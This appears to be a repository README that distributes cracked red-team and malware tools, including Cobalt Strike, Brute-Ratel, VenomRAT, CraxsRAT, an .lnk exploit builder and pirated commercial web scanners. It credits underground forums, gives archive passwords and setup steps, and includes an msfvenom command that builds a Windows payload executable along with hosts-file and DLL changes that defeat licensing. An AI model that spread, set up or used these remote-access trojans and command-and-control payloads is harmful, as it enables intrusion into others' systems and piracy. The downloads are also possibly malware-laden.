As of 1/27/2024 these tools will not be checked for malware using any sort of environment, you are responsible for any damages done to your computer, run these strictly in a VM environment.
Make sure to read notes at the bottom before opening any issue.
This is a full collection of red teaming tools which have been cracked by other people, if you need me to find anything, let me know via the issues tab.
Sandboxing is useful when it comes to testing whether or not the tools contain malware, and it is strongly recommended to do so depending on the tool size.
Name | Link | Description |
---|---|---|
AnyRun | any.run | A (mostly) free online interactive VM/sandbox, one of the best out there, requires business e-mail, however limited to 5 minutes per sample including a 16MB sample size (Bypassable up to 100-300MB) for free tier accounts |
TRIAGE | tria.ge | A completely free online interactive VM/sandbox, less informative compared to AnyRun, however it needs just a singular log in using any email or even GitHub, with up to a 30-minute sample time limit and no sample size limit. |
HybridAnalysis | hybrid-analysis.com | A completely (login-)free online sandbox, unlike the others it is not interactive, has a 100MB file size limit and has a very long queue to get your file analyzed. |
JoeSandbox | joesandbox.com | Appears to be a fully interactive online VM/sandbox with a 100MB file size limit, however I have never personally used it. |
CUCKOO | cuckoo.cert.ee | A non-interactive completely (login-)free online sandbox, appears to have no file size limit and I have rarely used it personally. |
Tool | Link |
---|---|
Cobalt Strike v4.9 (PW: 20231004_2218 ) |
Download |
Brute-Ratel v1.2.2 (Scandinavian Defense) | Download |
VenomRAT v6.0.1 | Download |
Tool | Link |
---|---|
CraxsRAT v6? ( |
Download |
SpyNote is outdated, wait for SpyNote X cracks to surface or use the tool above. |
Tool | Link |
---|---|
Immunity CANVAS v7.27 | Download |
Quantum .lnk Exploit Builder (02-10-22) | Download |
JexBot v1.0 (READ NOTES) | Download |
Tool | Link |
---|---|
Invicti Pro v24.1 | Download |
Burp Suite PRO v2023.6.1 (Install Script) | Download |
Acunetix Scanner v24.1 (Install Script) | Download |
Xray Pro v1.9.10 | Download |
HCL AppScan Standard v10.4.0 | Download |
Tool | Link |
---|---|
Acunetix Scanner v24.1 | Download |
Xray Pro v1.9.11 | Download |
Most of these tools are obtained from CyberArsenal and xss.is, credits for the cracks go to them.
If an archive asks for a password, try pwn3rzs
, Pwn3rzs
, xss.is
, XSS.IS
or exploit.in
Cobalt Strike requires you to deploy the teamserver on a Linux install such as Ubuntu, or whatever distro of your choice.
In order to run the Cobalt Strike client on your Windows install, you will have to run the following command:java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike-client.jar
.
On Linux, you can simply run start.sh
.
I am not sure whether or not this version of Brute-Ratel works properly, it has not been tested at all, however from the few basic functions I am assuming it works. If it does not, someone let me know.
If Brute-Ratel fails to compile the badger.bin into a badger.exe you can use the following to manually compile it: cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe
This version of CraxsRAT appears to be quite unstable when it comes to connections, if someone wants me to, I can attempt to find a newer version of this rat.
Immunity CANVAS contains the following: D2 Exploitation Pack v2.55
& White Phosphorus v1.28
.
Upon installing AppScan make sure to replace the installed DLLs with the cracked ones.
- Run add_hosts.bat as administrator, if you get an "Access Denied" error, open "C:\Windows\System32\drivers\etc\hosts" and add the following:
127.0.0.1 jex.tools
127.0.0.1 www.jex.tools
- Run "Jex_crack.exe" and then open "JEX BOT.exe"
- Put
mastercho
as the username and password and press login. Note: After logging into the JexBot, you may close "Jex_crack.exe", however you will have to re-open "Jex_crack.exe" every time you want to open the JexBot.
I am not sure if this is malware, as it is a remake of crax I've found on the xss.is forums going under "Anonymous V6", and it was also leaked according to OP.
Archive password: suspicious
Run strictly in a VM environment.